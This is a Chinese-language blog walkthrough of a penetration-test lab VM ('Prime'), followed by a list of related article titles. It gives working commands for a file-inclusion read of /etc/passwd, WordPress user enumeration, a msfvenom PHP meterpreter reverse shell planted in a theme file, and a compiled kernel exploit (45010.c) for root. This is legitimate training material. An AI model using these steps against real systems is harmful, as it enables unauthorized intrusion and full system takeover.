渗透测试PRIME

实验环境

靶机IP:192.168.172.128(通过netdiscover获取)

Kali机IP:192.168.172.130

发现存活主机:

netdiscover -r 192.168.172.0/24 或者使用nmap也可以

 

端口扫描

nmap -sV 192.168.172.128

浏览器访问192.168.172.128 

查看页面源代码,无可用信息

目录扫描试一下

dirb http://192.168.172.128  -X .txt,.php    //-X 指定后缀名

image.php和index.php显示的样式是一样的,访问一下secret.txt 看一下是否有可用信息

fuzz 模糊测试 

使用kali 的WFUZZ 工具爆破参数   这里爆破的参数是index.php中的参数

 

 一共946条记录,过滤word数量为12的

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.172.128/?FUZZ 

 看见file很自然想到了文件包含漏洞,尝试利用一下

http://192.168.172.128/index.php?file=/etc/passwd ,结果好像不太行【郁闷】

尝试使用secret.txt里给到的信息location.txt 

http://192.168.172.128/index.php?file=location.txt

使用secrettier360这个参数在其他php页面做些事情,提示给的很明显

除了index.php 我们还找到一个image.php,可以尝试以下

http://192.168.172.128/image.php?secrettier360=/etc/passwd

 

 可以读取文件,就是有点乱,使用curl 试一下

 

 可以用文件包含尝试读取一下/home/saket/password.txt

 ...密码是找到了,可这是哪的密码呢【...】

这个靶机除了80端口,还开放着22端口

可以用用户:saket 密码:follow_the_ippsec尝试远程连接一下

失败了

我决定再扫一遍目录,不带参数的那种,应该是漏掉了某些目录

dirb http://192.168.172.128

 果然,漏掉了

 访问一下

 既然是wordpress,那么就用kali 自带的专门针对wpscan 工具进行测试

wpscan --url http://192.168.172.128/wordpress -e u 用户名枚举

找到一个用户victor ,再配合密码follow_the_ippsec试一下登录wordpress的后台 

 登录成功

 

在这个主题编辑页面,可以修改源代码,不过不是所有页面都允许你修改

找到一个secret.php可以修改

使用kali msf生成一个回环连接的木马 

 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.172.130 lport=7777 -o shell.php

 将shell.php的内容复制到secret.php中

 

启用MSF框架的监听

 msfconsole

 use exploit/multi/handler

 set payload php/meterpreter/reverse_tcp

 set lhost 192.168.172.130

 set lport 7777

 exploit

 

接下来就是要访问secret.php这个页面了,但是不太确定这个文件的路径在哪

在页面的右上角,感觉secret.php这个文件应该是在Twenty Nineteen这个目录下面的 

最后算是找到了,也是一个固定的路径

wordpress/wp-content/themes/twentynineteen/secret.php

成功,接下来就是提权的问题了

 

 使用kali searchsploit ubuntu 16.04,这个版本是4.10.0 

searchsploit ubuntu 16.04

找到一条符合的本地权限提升的.c文件

 使用find命令查找45010.c的路径

把他复制到桌面,或者其他你方便操作的地方,这里我就复制到桌面了

cp /usr/share/exploitdb/exploits/linux/local/45010.c /root/Desktop/45010.c

gcc编译45010.c这个文件为可执行文件

gcc 45010.c -o 45010

 有了可执行文件,现在的问题就是如何把45010这个文件放到靶机里

这里我们可以用meterpreter中的upload 方法

upload /root/Desktop/45010 /tmp/45010

为什么要上传到tmp目录下呢,因为在linux中,所有用户都对tmp目录有读写的权限,方便我们操作

 

上传成功,但是没有执行权限

chmod 45010 +x 给文件执行权限

./45010执行文件

 

 whoami 查看一下权限,是root

 

 


文章标签:

原文连接:https://blog.csdn.net/weixin_44727454/article/details/124015564

相关推荐

小程序如何使用订阅消息(PHP代码+小程序js代码)

开源源码商城系统盘点

html网页如何获取后台数据库的数据(html + ajax + php + mysql)

2022鹏城杯web

全国中职网络安全B模块之国赛题远程代码执行渗透测试 //PHPstudy的后门漏洞分析

使用强大的DBPack处理分布式事务(PHP使用教程)

[MRCTF2020]Ezpop-1|php序列化

12个MySQL慢查询的原因分析

OpenSea PHP开发包

php图片加水印函数

vscode按住ctrl+鼠标左键无法跟踪跳转方法名【带vscode编辑PHP的配置教程】

如何使用 PHP 实现网页交互

php7.2安装OCI8扩展支持oracle数据库

唯一邀请码生成策略

docker安装RabbitMQ

PHP跌出前十,Python依然霸占榜首,C#有望摘得年度编程语言 TIOBE 12 月编程语言排行榜

高考后能学习——阿里云-winserver服务器购买以及使用(包含【.Net】、【PHP】、【MySQL】、【Navicat】、【Java】、安装)

【历史上的今天】6 月 8 日:万维网之父诞生;PHP 公开发布;iPhone 4 问世

✨✨PHP开发者福音,支持CRUD代码生成且前后分离的tp6+Vue3后台管理系统开源啦!

PHP编码规范